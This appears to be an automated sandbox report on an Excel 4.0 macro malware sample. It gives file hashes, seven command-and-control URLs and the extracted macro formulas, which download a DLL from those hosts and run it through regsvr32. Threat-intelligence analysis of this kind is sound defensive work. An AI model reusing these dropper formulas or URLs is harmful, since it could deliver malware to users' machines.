General

  • Target

    c5e91b67025af43532ffbc06cf7009684f0c632e61d1b41a022c6de9243b8c9a

  • Size

    20KB

  • Sample

    241120-rkrqrayclr

  • MD5

    3cf35d21c013505c2af4e059eff8b552

  • SHA1

    c1b2af94d52f68da802dbba83f0820da05110fd6

  • SHA256

    c5e91b67025af43532ffbc06cf7009684f0c632e61d1b41a022c6de9243b8c9a

  • SHA512

    dc82ea8c6411a5fecf1fad1ff1d6e563f87e7ca875bea10cd55335a077ffa6f1dfe1e2afc9b9352e45d327bb2255e6fb268b3dc0b84aff414ca7b8b5e1a0b3c3

  • SSDEEP

    384:eJaVb1GNjImo4CGzPd6ZIwwSKb5CzgObff9kC+xbX7Fg7a:kiIN3o4FLTCBn9kC+xbLF1

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://banrai.ac.th/website/IHI0iNLLWDh9P/

http://bangsoe.dk/__backup/JON6L/

http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/

https://barkstage.es/wp-content/S0Q/

https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/

http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/

https://www.manchesterot.co.uk/about-us/LFXAJJIa/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://banrai.ac.th/website/IHI0iNLLWDh9P/","..\kytk.dll",0,0)
    =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bangsoe.dk/__backup/JON6L/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://barkstage.es/wp-content/S0Q/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterot.co.uk/about-us/LFXAJJIa/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D26<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll")
    =RETURN()

Extracted

Language
xlm4.0

Source          URLs
xlm40.dropper   https://banrai.ac.th/website/IHI0iNLLWDh9P/
xlm40.dropper   http://bangsoe.dk/__backup/JON6L/
xlm40.dropper   http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/
xlm40.dropper   https://barkstage.es/wp-content/S0Q/

Targets

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
